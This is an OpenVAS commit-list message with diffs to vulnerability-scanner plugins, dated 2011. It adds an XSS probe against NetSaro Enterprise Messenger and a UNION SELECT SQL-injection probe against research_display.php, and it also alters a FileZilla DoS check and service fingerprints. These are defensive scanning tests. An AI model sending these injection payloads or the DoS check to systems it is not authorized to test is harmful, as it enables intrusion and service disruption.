[Openvas-commits] r11543 - in trunk/openvas-plugins: . scripts

scm-commit@wald.intevation.org scm-commit at wald.intevation.org
Thu Sep 1 14:04:16 CEST 2011 

Author: mime
Date: 2011-09-01 14:04:12 +0200 (Thu, 01 Sep 2011)
New Revision: 11543

Added:
   trunk/openvas-plugins/scripts/gb_netsaro_49390.nasl
   trunk/openvas-plugins/scripts/gb_research_display_49395.nasl
Modified:
   trunk/openvas-plugins/ChangeLog
   trunk/openvas-plugins/scripts/filezilla_server_port_cmd_dos.nasl
   trunk/openvas-plugins/scripts/find_service2.nasl
   trunk/openvas-plugins/scripts/gb_dokuwiki_detect.nasl
Log:
Added new plugins. Added new Banner submitted by Matthew Coene. Make sure it is realy a dokuwiki. Close soc and reopen a new one before testing if the ftpd is up.

Modified: trunk/openvas-plugins/ChangeLog
===================================================================
--- trunk/openvas-plugins/ChangeLog	2011-09-01 09:32:45 UTC (rev 11542)
+++ trunk/openvas-plugins/ChangeLog	2011-09-01 12:04:12 UTC (rev 11543)
@@ -1,3 +1,16 @@
+2011-09-01  Michael Meyer <michael.meyer at greenbone.net>
+
+	* scripts/gb_netsaro_49390.nasl,
+	scripts/gb_research_display_49395.nasl:
+	Added new plugins.
+
+	* scripts/gb_dokuwiki_detect.nasl:
+	Make sure it is realy a dokuwiki.
+
+	* scripts/filezilla_server_port_cmd_dos.nasl:
+	Close soc and reopen a new one before testing if the ftpd is
+	up.
+
 2011-08-31  Veerendra G.G <veerendragg at secpod.com>
 
 	* scripts/secpod_vmware_vfabric_tc_server_security_bypass_vuln.nasl,

Modified: trunk/openvas-plugins/scripts/filezilla_server_port_cmd_dos.nasl
===================================================================
--- trunk/openvas-plugins/scripts/filezilla_server_port_cmd_dos.nasl	2011-09-01 09:32:45 UTC (rev 11542)
+++ trunk/openvas-plugins/scripts/filezilla_server_port_cmd_dos.nasl	2011-09-01 12:04:12 UTC (rev 11543)
@@ -115,8 +115,13 @@
 ###step 3: attack succeeded?###
 ###############################
 
-is_alive = ftp_recv_line(socket:soc);
+close(soc);
 
+sleep(5);
+
+soc1 = open_sock_tcp(port);
+is_alive = ftp_recv_line(socket:soc1);
+
 if (!is_alive) {
   report = desc + report;
   security_warning(data:report, port:port);
@@ -124,4 +129,4 @@
 
 #end of exploit, closing open socket
 
-close(soc);
+close(soc1);

Modified: trunk/openvas-plugins/scripts/find_service2.nasl
===================================================================
--- trunk/openvas-plugins/scripts/find_service2.nasl	2011-09-01 09:32:45 UTC (rev 11542)
+++ trunk/openvas-plugins/scripts/find_service2.nasl	2011-09-01 12:04:12 UTC (rev 11543)
@@ -167,6 +167,40 @@
 
 }
 
+#0x00:  94 00 00 00 F4 FF FF FF 01 00 00 00 FF FF FF FF    ................
+#0x10:  00 00 00 00 A5 00 00 00 00 00 00 00 04 00 00 00    ................
+#0x20:  3E F9 E6 B9 9B FE 6B 7C 2D 69 87 74 0B F3 10 66    >.....k|-i.t...f
+#0x30:  87 C2 A8 59 A6 18 B4 BD AE BF 7A 5A 3A F4 23 AC    ...Y......zZ:.#.
+#0x40:  F6 E4 FC DE 59 80 0C 9F 05 DD BC E5 7E DE 7D 19    ....Y.......~.}.
+#0x50:  DC 7D 34 2F EC 2D 63 5D 2F 4E 35 26 DD 7C C3 AB    .}4/.-c]/N5&.|..
+#0x60:  AC 13 28 D3 B3 A5 BA F0 FD D6 FA 22 BF 4D F2 4D    ..(........".M.M
+#0x70:  A6 70 08 98 0E 7D 82 59 D7 F3 87 3B 9E C7 C5 95    .p...}.Y...;....
+#0x80:  06 54 61 43 ED F9 57 BB 50 25 1A B6 A6 61 CE BD    .TaC..W.P%...a..
+#0x90:  C1 29 69 76 D5 30 10 CC 60 40 48 EF 8D E0 AC 76    .)iv.0..`@H....v
+#0xA0:  FF FE FF FE FF FF FB FF CE BE AC AD FF FF 5B FF    ..............[.
+#0xB0:  FF FF FD FF
+# # submitted by Matthew Coene <mcoene at Bacardi.com> 26.08.11
+
+if(raw_string(
+0x94,0x00,0x00,0x00,0xF4,0xFF,0xFF,0xFF,0x01,0x00,0x00,0x00,0xFF,0xFF,0xFF,0xFF,
+0x00,0x00,0x00,0x00,0xA5,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x04,0x00,0x00,0x00,
+0x3E,0xF9,0xE6,0xB9,0x9B,0xFE,0x6B,0x7C,0x2D,0x69,0x87,0x74,0x0B,0xF3,0x10,0x66,
+0x87,0xC2,0xA8,0x59,0xA6,0x18,0xB4,0xBD,0xAE,0xBF,0x7A,0x5A,0x3A,0xF4,0x23,0xAC,
+0xF6,0xE4,0xFC,0xDE,0x59,0x80,0x0C,0x9F,0x05,0xDD,0xBC,0xE5,0x7E,0xDE,0x7D,0x19,
+0xDC,0x7D,0x34,0x2F,0xEC,0x2D,0x63,0x5D,0x2F,0x4E,0x35,0x26,0xDD,0x7C,0xC3,0xAB,
+0xAC,0x13,0x28,0xD3,0xB3,0xA5,0xBA,0xF0,0xFD,0xD6,0xFA,0x22,0xBF,0x4D,0xF2,0x4D,
+0xA6,0x70,0x08,0x98,0x0E,0x7D,0x82,0x59,0xD7,0xF3,0x87,0x3B,0x9E,0xC7,0xC5,0x95,
+0x06,0x54,0x61,0x43,0xED,0xF9,0x57,0xBB,0x50,0x25,0x1A,0xB6,0xA6,0x61,0xCE,0xBD,
+0xC1,0x29,0x69,0x76,0xD5,0x30,0x10,0xCC,0x60,0x40,0x48,0xEF,0x8D,0xE0,0xAC,0x76,
+0xFF,0xFE,0xFF,0xFE,0xFF,0xFF,0xFB,0xFF,0xCE,0xBE,0xAC,0xAD,0xFF,0xFF,0x5B,0xFF,
+0xFF,0xFF,0xFD,0xF9) >< buf && (port == 2800 || port == 2500 || port == 2501 || port == 2502 || port == 2503 || port == 2506 || port == 2505 || port == 2600 || port == 2801 || port == 2900)) {
+
+  register_service(port:port, proto:"CCure");
+  security_note(port:port, data:"A Ccure security management solution is running on this port");
+  exit(0);
+
+}
+
 # [root at f00dikator new_nasl_mods]# telnet 10.10.10.7 7110
 # Trying 10.10.10.7...
 # Connected to 10.10.10.7.

Modified: trunk/openvas-plugins/scripts/gb_dokuwiki_detect.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_dokuwiki_detect.nasl	2011-09-01 09:32:45 UTC (rev 11542)
+++ trunk/openvas-plugins/scripts/gb_dokuwiki_detect.nasl	2011-09-01 12:04:12 UTC (rev 11543)
@@ -64,6 +64,11 @@
 
 foreach dir (make_list("/dokuwiki", cgi_dirs()))
 {
+
+  req = http_get(item:string(dir + "/feed.php"), port:dokuwikiPort);
+  rcv = http_keepalive_send_recv(port:dokuwikiPort, data:req,bodyonly:0);
+  if("dokuwiki" >!< tolower(rcv))continue;
+
   sndReq = http_get(item:string(dir + "/VERSION"), port:dokuwikiPort);
   rcvRes = http_keepalive_send_recv(port:dokuwikiPort, data:sndReq, bodyonly:1);
   if (rcvRes != NULL)

Added: trunk/openvas-plugins/scripts/gb_netsaro_49390.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_netsaro_49390.nasl	2011-09-01 09:32:45 UTC (rev 11542)
+++ trunk/openvas-plugins/scripts/gb_netsaro_49390.nasl	2011-09-01 12:04:12 UTC (rev 11543)
@@ -0,0 +1,93 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# NetSaro Enterprise Messenger Cross Site Scripting and HTML Injection Vulnerabilities
+#
+# Authors:
+# Michael Meyer <michael.meyer at greenbone.net>
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if (description)
+{
+ script_id(103236);
+ script_bugtraq_id(49390);
+ script_version ("1.0-$Revision$");
+
+ script_name("NetSaro Enterprise Messenger Cross Site Scripting and HTML Injection Vulnerabilities");
+
+desc = "Overview:
+NetSaro Enterprise Messenger is prone to multiple cross-site
+scripting and HTML-injection vulnerabilities because it fails to
+properly sanitize user-supplied input before using it in dynamically
+generated content.
+
+Successful exploits will allow attacker-supplied HTML and script
+code to run in the context of the affected browser, potentially
+allowing the attacker to steal cookie-based authentication
+credentials or to control how the site is rendered to the user.
+Other attacks are also possible.
+
+NetSaro Enterprise Messenger 2.0 is vulnerable; other versions may
+also be affected.
+
+References:
+http://www.securityfocus.com/bid/49390
+http://www.netsaro.com/";
+
+ script_tag(name:"risk_factor", value:"Medium");
+ script_description(desc);
+ script_summary("Determine if installed NetSaro Enterprise Messenger is vulnerable");
+ script_category(ACT_ATTACK);
+ script_family("Web application abuses");
+ script_copyright("This script is Copyright (C) 2011 Greenbone Networks GmbH");
+ script_dependencies("find_service.nes", "http_version.nasl");
+ script_require_ports("Services/www", 4990);
+ exit(0);
+}
+
+include("http_func.inc");
+include("host_details.inc");
+include("http_keepalive.inc");
+include("global_settings.inc");
+   
+port = get_http_port(default:4990);
+if(!get_port_state(port))exit(0);
+
+sndReq = http_get(item:"/", port:port);
+rcvRes = http_keepalive_send_recv(port:port, data:sndReq);
+
+if("<title>NetSaro Administration Console</title>" >!< rcvRes)exit(0);
+
+req = string("POST /login.nsp HTTP/1.1\r\n",
+	     "Host: ", get_host_name(),"\r\n",
+	     "Content-Type: application/x-www-form-urlencoded\r\n",
+	     "Content-Length: 131\r\n",
+	     "\r\n",
+	     "username=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28%22openvas-xss-test%22%29%3C%2Fscript%3E&password=&login=Log+In&postback=postback\r\n",
+	     "\r\n");
+
+rcvRes = http_keepalive_send_recv(port:port, data:req);
+
+if('"></script><script>alert("openvas-xss-test")</script>"' >< rcvRes)  {
+
+  security_warning(port:port);
+  exit(0);
+
+}  


Property changes on: trunk/openvas-plugins/scripts/gb_netsaro_49390.nasl
___________________________________________________________________
Name: svn:keywords
   + Id Revision

Added: trunk/openvas-plugins/scripts/gb_research_display_49395.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_research_display_49395.nasl	2011-09-01 09:32:45 UTC (rev 11542)
+++ trunk/openvas-plugins/scripts/gb_research_display_49395.nasl	2011-09-01 12:04:12 UTC (rev 11543)
@@ -0,0 +1,84 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# 'research_display.php' SQL Injection Vulnerability
+#
+# Authors:
+# Michael Meyer <michael.meyer at greenbone.net>
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if (description)
+{
+ script_id(103235);
+ script_bugtraq_id(49395);
+ script_version ("1.0-$Revision$");
+
+ script_name("'research_display.php' SQL Injection Vulnerability");
+
+desc = "Overview:
+research_display.php is prone to an SQL-injection vulnerability because it
+fails to sufficiently sanitize user-supplied data before using it in
+an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the
+application, access or modify data, or exploit latent vulnerabilities
+in the underlying database.
+
+References:
+http://www.securityfocus.com/bid/49395";
+
+ script_tag(name:"risk_factor", value:"Medium");
+ script_description(desc);
+ script_summary("Determine if research_display.php is prone to an SQL-injection vulnerability");
+ script_category(ACT_ATTACK);
+ script_family("Web application abuses");
+ script_copyright("This script is Copyright (C) 2011 Greenbone Networks GmbH");
+ script_dependencies("find_service.nes", "http_version.nasl");
+ script_require_ports("Services/www", 80);
+ script_exclude_keys("Settings/disable_cgi_scanning");
+ exit(0);
+}
+
+include("http_func.inc");
+include("host_details.inc");
+include("http_keepalive.inc");
+include("global_settings.inc");
+   
+port = get_http_port(default:80);
+if(!get_port_state(port))exit(0);
+
+if(!can_host_php(port:port))exit(0);
+
+dirs = make_list(cgi_dirs());
+
+foreach dir (dirs) {
+   
+  url = string(dir, "/research_display.php?ID=-null+UNiON+ALL+SELECT+null,null,null,0x4f70656e5641532d53514c2d496e6a656374696f6e2d54657374,null,null,null"); 
+
+  if(http_vuln_check(port:port, url:url,pattern:"OpenVAS-SQL-Injection-Test")) {
+     
+    security_warning(port:port);
+    exit(0);
+
+  }
+}
+
+exit(0);
+


Property changes on: trunk/openvas-plugins/scripts/gb_research_display_49395.nasl
___________________________________________________________________
Name: svn:keywords
   + Id Revision

More information about the Openvas-commits mailing list